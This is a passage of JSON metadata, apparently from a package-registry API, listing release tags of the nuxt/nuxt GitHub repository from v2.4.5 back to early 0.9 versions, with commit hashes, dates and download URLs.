ind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts